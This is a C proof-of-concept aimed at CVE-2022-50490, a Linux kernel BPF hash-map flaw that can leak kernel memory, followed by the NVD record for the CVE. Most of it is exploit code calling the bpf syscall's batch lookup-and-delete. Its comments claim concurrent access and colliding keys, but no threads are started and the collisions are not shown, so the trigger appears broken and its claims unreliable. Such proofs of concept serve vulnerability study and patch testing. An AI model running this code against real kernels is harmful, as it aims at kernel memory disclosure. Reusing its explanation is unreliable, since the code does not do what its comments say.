CVE-2022-50490

// CVE-2022-50490 PoC - Trigger EBUSY in htab_lock_bucket() // This PoC demonstrates triggering the vulnerability by creating // concurrent access to BPF hash map buckets #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <pthread.h> #include <sys/syscall.h> #include <linux/bpf.h> #define BPF_MAP_TYPE_HASH 1 #define BPF_MAP_TYPE_PERCPU_HASH 5 // Wrapper for bpf syscall static int bpf(int cmd, union bpf_attr *attr, unsigned int size) { return syscall(__NR_bpf, cmd, attr, size); } // Create a BPF hash map static int create_hash_map(int map_type, int key_size, int value_size, int max_entries) { union bpf_attr attr; memset(&attr, 0, sizeof(attr)); attr.map_type = map_type; attr.key_size = key_size; attr.value_size = value_size; attr.max_entries = max_entries; return bpf(BPF_MAP_CREATE, &attr, sizeof(attr)); } // Update BPF map element static int map_update_elem(int fd, const void *key, const void *value) { union bpf_attr attr; memset(&attr, 0, sizeof(attr)); attr.map_fd = fd; attr.key = (unsigned long long)key; attr.value = (unsigned long long)value; attr.flags = BPF_ANY; return bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); } // Lookup and delete batch operation - triggers the vulnerability static int map_lookup_and_delete_batch(int fd, void *in_batch, void *out_batch, void *keys, void *values, int *count) { union bpf_attr attr; memset(&attr, 0, sizeof(attr)); attr.map_fd = fd; attr.batch = (unsigned long long)out_batch; attr.in_batch = (unsigned long long)in_batch; attr.keys = (unsigned long long)keys; attr.values = (unsigned long long)values; attr.count = *count; int ret = bpf(BPF_MAP_LOOKUP_AND_DELETE_BATCH, &attr, sizeof(attr)); *count = attr.count; return ret; } int main(int argc, char **argv) { int map_fd, ret; int batch_count = 4; __u32 keys[16]; __u32 values[16]; __u64 in_batch = 0; __u64 out_batch = 0; // Create a hash map with limited entries to trigger bucket contention map_fd = create_hash_map(BPF_MAP_TYPE_HASH, sizeof(__u32), sizeof(__u32), 4); if (map_fd < 0) { perror("Failed to create BPF map"); return 1; } // Populate the map with elements that hash to the same bucket // This increases the chance of EBUSY from htab_lock_bucket() for (int i = 0; i < 4; i++) { keys[i] = i; values[i] = i * 100; ret = map_update_elem(map_fd, &keys[i], &values[i]); if (ret < 0) { perror("Failed to update map element"); } } // Perform batch lookup and delete - this may trigger the vulnerability // when htab_lock_bucket() returns EBUSY due to concurrent access ret = map_lookup_and_delete_batch(map_fd, &in_batch, &out_batch, keys, values, &batch_count); if (ret == -1) { perror("Batch operation failed"); } else { printf("Batch operation completed, count=%d\n", batch_count); } close(map_fd); return 0; }

{"cve": {"id": "CVE-2022-50490", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:45.947", "lastModified": "2026-03-25T00:31:54.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Propagate error from htab_lock_bucket() to userspace\n\nIn __htab_map_lookup_and_delete_batch() if htab_lock_bucket() returns\n-EBUSY, it will go to next bucket. Going to next bucket may not only\nskip the elements in current bucket silently, but also incur\nout-of-bound memory access or expose kernel memory to userspace if\ncurrent bucket_cnt is greater than bucket_size or zero.\n\nFixing it by stopping batch operation and returning -EBUSY when\nhtab_lock_bucket() fails, and the application can retry or skip the busy\nbatch as needed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0e13425104903970a5ede853082d3bbb4edec6f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4f1f39a8f1ce1b24fee6852d7dcd704ce7c4334d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/66a7a92e4d0d091e79148a4c6ec15d1da65f4280", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6bfee6eb3d6b96ae730a542909dd22b5f9f50d58", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}